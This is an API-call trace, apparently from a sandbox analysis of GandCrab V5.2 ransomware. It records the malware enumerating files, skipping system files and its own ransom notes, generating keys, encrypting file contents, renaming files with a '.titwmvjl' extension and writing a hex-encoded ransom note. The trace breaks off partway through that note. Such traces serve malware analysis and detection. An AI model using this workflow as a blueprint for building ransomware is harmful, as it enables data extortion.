lstrcmpiW (lpString1="7Vis L VfHrcV53y.png", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0088.476] lstrcmpiW (lpString1="7Vis L VfHrcV53y.png", lpString2="KRAB-DECRYPT.html") returned -1 [0088.476] lstrcmpiW (lpString1="7Vis L VfHrcV53y.png", lpString2="CRAB-DECRYPT.html") returned -1 [0088.476] lstrcmpiW (lpString1="7Vis L VfHrcV53y.png", lpString2="KRAB-DECRYPT.txt") returned -1 [0088.477] lstrcmpiW (lpString1="7Vis L VfHrcV53y.png", lpString2="CRAB-DECRYPT.txt") returned -1 [0088.477] lstrcmpiW (lpString1="7Vis L VfHrcV53y.png", lpString2="ntldr") returned -1 [0088.477] lstrcmpiW (lpString1="7Vis L VfHrcV53y.png", lpString2="NTDETECT.COM") returned -1 [0088.477] lstrcmpiW (lpString1="7Vis L VfHrcV53y.png", lpString2="Bootfont.bin") returned -1 [0088.477] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\7Vis L VfHrcV53y.png") returned 74 [0088.477] lstrlenW (lpString=".png") returned 4 [0088.477] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.477] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".png ") returned 5 [0088.477] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.477] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.477] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\7Vis L VfHrcV53y.png" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\fpvesj\\7vis l vfhrcv53y.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2bc [0088.477] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.478] ReadFile (in: hFile=0x2bc, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ef48, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ef48*=0x21c, lpOverlapped=0x0) returned 1 [0088.478] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.478] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.478] CryptAcquireContextW (in: phProv=0x259ee78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee78*=0x4c9980) returned 1 [0088.479] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0088.480] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0088.480] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0088.480] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259ef04 | out: pbBuffer=0x259ef04) returned 1 [0088.480] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.480] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.480] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.480] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.480] CryptAcquireContextW (in: phProv=0x259ee78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee78*=0x4c9980) returned 1 [0088.481] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0088.482] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0088.482] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0088.482] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259ef24 | out: pbBuffer=0x259ef24) returned 1 [0088.482] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.482] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.482] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.482] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.482] CryptAcquireContextW (in: phProv=0x259ee6c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee6c*=0x4c9980) returned 1 [0088.484] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.484] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ee70 | out: phKey=0x259ee70*=0x5036f8) returned 1 [0088.484] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.484] CryptGetKeyParam (in: hKey=0x5036f8, dwParam=0x8, pbData=0x259ee64, pdwDataLen=0x259ee68, dwFlags=0x0 | out: pbData=0x259ee64*=0x800, pdwDataLen=0x259ee68*=0x4) returned 1 [0088.484] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.484] CryptEncrypt (in: hKey=0x5036f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259ee9c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259ee9c*=0x100) returned 1 [0088.484] GetLastError () returned 0x0 [0088.484] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.484] CryptDestroyKey (hKey=0x5036f8) returned 1 [0088.484] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.485] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.485] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.485] CryptAcquireContextW (in: phProv=0x259ee6c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee6c*=0x4c9980) returned 1 [0088.486] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.486] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ee70 | out: phKey=0x259ee70*=0x503278) returned 1 [0088.486] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.486] CryptGetKeyParam (in: hKey=0x503278, dwParam=0x8, pbData=0x259ee64, pdwDataLen=0x259ee68, dwFlags=0x0 | out: pbData=0x259ee64*=0x800, pdwDataLen=0x259ee68*=0x4) returned 1 [0088.486] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.487] CryptEncrypt (in: hKey=0x503278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259ee9c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259ee9c*=0x100) returned 1 [0088.487] GetLastError () returned 0x0 [0088.487] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.487] CryptDestroyKey (hKey=0x503278) returned 1 [0088.487] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.487] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.487] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0088.487] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0088.488] ReadFile (in: hFile=0x2bc, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ef48, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ef48*=0x16e2a, lpOverlapped=0x0) returned 1 [0088.494] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0xfffe91d6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.494] WriteFile (in: hFile=0x2bc, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x16e2a, lpNumberOfBytesWritten=0x259ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ef2c*=0x16e2a, lpOverlapped=0x0) returned 1 [0088.502] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.502] WriteFile (in: hFile=0x2bc, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ef2c*=0x21c, lpOverlapped=0x0) returned 1 [0088.504] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.507] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.508] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.508] CloseHandle (hObject=0x2bc) returned 1 [0088.509] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\7Vis L VfHrcV53y.png" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\fpvesj\\7vis l vfhrcv53y.png"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\7Vis L VfHrcV53y.png.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\fpvesj\\7vis l vfhrcv53y.png.titwmvjl"), dwFlags=0x1) returned 1 [0088.509] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.509] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0088.510] lstrcmpW (lpString1="ahKkwxcyM.avi", lpString2=".") returned 1 [0088.510] lstrcmpW (lpString1="ahKkwxcyM.avi", lpString2="..") returned 1 [0088.510] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\", lpString2="ahKkwxcyM.avi" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\ahKkwxcyM.avi") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\ahKkwxcyM.avi" [0088.510] lstrlenW (lpString=".titwmvjl") returned 9 [0088.510] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\ahKkwxcyM.avi") returned 67 [0088.510] VirtualAlloc (lpAddress=0x0, dwSize=0xc6, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0088.510] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\ahKkwxcyM.avi.titwmvjl") returned 76 [0088.510] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\ahKkwxcyM.avi") returned 67 [0088.510] lstrlenW (lpString=".avi") returned 4 [0088.510] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.510] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".avi ") returned 5 [0088.510] lstrcmpiW (lpString1=".avi", lpString2=".titwmvjl") returned -1 [0088.510] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.510] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\ahKkwxcyM.avi") returned 67 [0088.510] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\ahKkwxcyM.avi") returned 67 [0088.510] lstrcmpiW (lpString1="ahKkwxcyM.avi", lpString2="desktop.ini") returned -1 [0088.510] lstrcmpiW (lpString1="ahKkwxcyM.avi", lpString2="autorun.inf") returned -1 [0088.510] lstrcmpiW (lpString1="ahKkwxcyM.avi", lpString2="ntuser.dat") returned -1 [0088.510] lstrcmpiW (lpString1="ahKkwxcyM.avi", lpString2="iconcache.db") returned -1 [0088.510] lstrcmpiW (lpString1="ahKkwxcyM.avi", lpString2="bootsect.bak") returned -1 [0088.510] lstrcmpiW (lpString1="ahKkwxcyM.avi", lpString2="boot.ini") returned -1 [0088.510] lstrcmpiW (lpString1="ahKkwxcyM.avi", lpString2="ntuser.dat.log") returned -1 [0088.510] lstrcmpiW (lpString1="ahKkwxcyM.avi", lpString2="thumbs.db") returned -1 [0088.510] lstrcmpiW (lpString1="ahKkwxcyM.avi", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0088.511] lstrcmpiW (lpString1="ahKkwxcyM.avi", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0088.511] lstrcmpiW (lpString1="ahKkwxcyM.avi", lpString2="KRAB-DECRYPT.html") returned -1 [0088.511] lstrcmpiW (lpString1="ahKkwxcyM.avi", lpString2="CRAB-DECRYPT.html") returned -1 [0088.511] lstrcmpiW (lpString1="ahKkwxcyM.avi", lpString2="KRAB-DECRYPT.txt") returned -1 [0088.511] lstrcmpiW (lpString1="ahKkwxcyM.avi", lpString2="CRAB-DECRYPT.txt") returned -1 [0088.511] lstrcmpiW (lpString1="ahKkwxcyM.avi", lpString2="ntldr") returned -1 [0088.511] lstrcmpiW (lpString1="ahKkwxcyM.avi", lpString2="NTDETECT.COM") returned -1 [0088.511] lstrcmpiW (lpString1="ahKkwxcyM.avi", lpString2="Bootfont.bin") returned -1 [0088.511] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\ahKkwxcyM.avi") returned 67 [0088.511] lstrlenW (lpString=".avi") returned 4 [0088.511] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.511] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".avi ") returned 5 [0088.511] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.511] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.511] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\ahKkwxcyM.avi" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\fpvesj\\ahkkwxcym.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2bc [0088.512] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.512] ReadFile (in: hFile=0x2bc, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ef48, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ef48*=0x21c, lpOverlapped=0x0) returned 1 [0088.512] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.512] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.512] CryptAcquireContextW (in: phProv=0x259ee78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee78*=0x4c9980) returned 1 [0088.514] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0088.514] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0088.514] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0088.514] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259ef04 | out: pbBuffer=0x259ef04) returned 1 [0088.514] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.514] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.514] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.515] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.515] CryptAcquireContextW (in: phProv=0x259ee78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee78*=0x4c9980) returned 1 [0088.516] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0088.516] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0088.516] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0088.516] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259ef24 | out: pbBuffer=0x259ef24) returned 1 [0088.516] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.516] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.516] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.517] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.517] CryptAcquireContextW (in: phProv=0x259ee6c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee6c*=0x4c9980) returned 1 [0088.518] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.518] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ee70 | out: phKey=0x259ee70*=0x5037b8) returned 1 [0088.518] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.518] CryptGetKeyParam (in: hKey=0x5037b8, dwParam=0x8, pbData=0x259ee64, pdwDataLen=0x259ee68, dwFlags=0x0 | out: pbData=0x259ee64*=0x800, pdwDataLen=0x259ee68*=0x4) returned 1 [0088.518] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.518] CryptEncrypt (in: hKey=0x5037b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259ee9c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259ee9c*=0x100) returned 1 [0088.519] GetLastError () returned 0x0 [0088.519] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.519] CryptDestroyKey (hKey=0x5037b8) returned 1 [0088.519] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.519] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.519] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.519] CryptAcquireContextW (in: phProv=0x259ee6c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee6c*=0x4c9980) returned 1 [0088.520] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.520] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ee70 | out: phKey=0x259ee70*=0x503478) returned 1 [0088.520] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.521] CryptGetKeyParam (in: hKey=0x503478, dwParam=0x8, pbData=0x259ee64, pdwDataLen=0x259ee68, dwFlags=0x0 | out: pbData=0x259ee64*=0x800, pdwDataLen=0x259ee68*=0x4) returned 1 [0088.521] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.521] CryptEncrypt (in: hKey=0x503478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259ee9c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259ee9c*=0x100) returned 1 [0088.521] GetLastError () returned 0x0 [0088.521] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.521] CryptDestroyKey (hKey=0x503478) returned 1 [0088.521] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.521] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.521] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0088.521] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0088.522] ReadFile (in: hFile=0x2bc, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ef48, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ef48*=0x938d, lpOverlapped=0x0) returned 1 [0088.527] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0xffff6c73, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.527] WriteFile (in: hFile=0x2bc, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x938d, lpNumberOfBytesWritten=0x259ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ef2c*=0x938d, lpOverlapped=0x0) returned 1 [0088.529] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.529] WriteFile (in: hFile=0x2bc, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ef2c*=0x21c, lpOverlapped=0x0) returned 1 [0088.530] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.534] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.534] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.534] CloseHandle (hObject=0x2bc) returned 1 [0088.535] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\ahKkwxcyM.avi" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\fpvesj\\ahkkwxcym.avi"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\ahKkwxcyM.avi.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\fpvesj\\ahkkwxcym.avi.titwmvjl"), dwFlags=0x1) returned 1 [0088.535] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.535] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0088.535] lstrcmpW (lpString1="alhA3aUz", lpString2=".") returned 1 [0088.536] lstrcmpW (lpString1="alhA3aUz", lpString2="..") returned 1 [0088.536] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\", lpString2="alhA3aUz" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz" [0088.536] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\" [0088.536] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0088.536] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0088.536] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0088.536] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0088.536] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0088.536] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0088.536] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0088.537] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0088.537] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0088.537] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.537] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0088.538] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\\\TITWMVJL-DECRYPT.txt") returned 84 [0088.538] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\fpvesj\\alha3auz\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0088.539] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0